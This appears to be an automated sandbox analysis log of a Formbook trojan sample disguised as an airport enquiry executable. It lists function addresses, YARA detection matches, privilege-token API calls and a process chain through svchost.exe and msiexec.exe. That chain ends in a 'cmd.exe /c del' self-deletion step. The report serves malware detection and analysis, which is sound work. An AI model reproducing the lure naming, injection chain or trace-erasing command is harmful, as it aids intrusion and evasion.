          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FE0CF23_2_04FE0CF2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0508CD1F3_2_0508CD1F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05008DBF3_2_05008DBF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF0C003_2_04FF0C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FEADE03_2_04FEADE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05090CB53_2_05090CB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FFAD003_2_04FFAD00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05032F283_2_05032F28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05010F303_2_05010F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05092F303_2_05092F30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05064F403_2_05064F40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF0E593_2_04FF0E59
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0506EFA03_2_0506EFA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AEE263_2_050AEE26
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FE2FC83_2_04FE2FC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05002E903_2_05002E90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050ACE933_2_050ACE93
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AEEDB3_2_050AEEDB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FD68B83_2_04FD68B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050069623_2_05006962
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050BA9A63_2_050BA9A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF28403_2_04FF2840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FFA8403_2_04FFA840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF29A03_2_04FF29A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0501E8F03_2_0501E8F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AAB403_2_050AAB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FEEA803_2_04FEEA80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A6BD73_2_050A6BD7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A75713_2_050A7571
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FE14603_2_04FE1460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0508D5B03_2_0508D5B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050B95C33_2_050B95C3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AF43F3_2_050AF43F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AF7B03_2_050AF7B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050356303_2_05035630
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A16CC3_2_050A16CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF70C03_2_04FF70C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050BB16B3_2_050BB16B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0502516C3_2_0502516C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FFB1B03_2_04FFB1B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FDF1723_2_04FDF172
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0509F0CC3_2_0509F0CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A70E93_2_050A70E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AF0E03_2_050AF0E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A132D3_2_050A132D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF52A03_2_04FF52A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0503739A3_2_0503739A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FDD34C3_2_04FDD34C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0500B2C03_2_0500B2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050912ED3_2_050912ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0500D2F03_2_0500D2F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A1D5A3_2_050A1D5A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A7D733_2_050A7D73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0500FDC03_2_0500FDC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05069C323_2_05069C32
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF3D403_2_04FF3D40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AFCF23_2_050AFCF2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AFF093_2_050AFF09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF9EB03_2_04FF9EB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AFFB13_2_050AFFB1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FB3FD23_2_04FB3FD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FB3FD53_2_04FB3FD5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF1F923_2_04FF1F92
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050859103_2_05085910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF38E03_2_04FF38E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0500B9503_2_0500B950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0505D8003_2_0505D800
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04FF99503_2_04FF9950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AFB763_2_050AFB76
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0500FB803_2_0500FB80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05065BF03_2_05065BF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0502DBF93_2_0502DBF9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050AFA493_2_050AFA49
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050A7A463_2_050A7A46
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05063A6C3_2_05063A6C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05035AA03_2_05035AA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0508DAAC3_2_0508DAAC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05091AA33_2_05091AA3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0509DAC63_2_0509DAC6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_03102FB03_2_03102FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_03109E603_2_03109E60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_03102D903_2_03102D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E6A0363_2_04E6A036
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E6E5CD3_2_04E6E5CD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E62D023_2_04E62D02
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E610823_2_04E61082
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E689123_2_04E68912
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E6B2323_2_04E6B232
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E65B323_2_04E65B32
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E65B303_2_04E65B30
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: String function: 00CA8B40 appears 42 times
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: String function: 00C87F41 appears 35 times
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: String function: 00CA0D27 appears 70 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 107 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0505EA12 appears 86 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04FDB970 appears 262 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 05037E54 appears 107 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 05025130 appears 58 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0506F290 appears 103 times
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1678566324.00000000040B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1678332913.000000000422D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.4143107748.000000000E6AA000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: New Al Maktoum International Airport Enquiry Ref #2401249.exe PID: 7428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7456, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: msiexec.exe PID: 7504, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@14/5
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEA2D5 GetLastError,FormatMessageW,0_2_00CEA2D5
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CD8713 AdjustTokenPrivileges,CloseHandle,0_2_00CD8713
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CD8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00CD8CC3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_00972F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,3_2_00972F93
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00CEB59E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CFF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00CFF121
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00CF86D0
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00C84FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C84FE9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_00977DD0 StartServiceCtrlDispatcherW,GetLastError,3_2_00977DD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_00977DD0 StartServiceCtrlDispatcherW,GetLastError,3_2_00977DD0
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeFile created: C:\Users\user\AppData\Local\Temp\aut39CA.tmpJump to behavior
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeReversingLabs: Detection: 31%
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeVirustotal: Detection: 29%
          Source: unknownProcess created: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
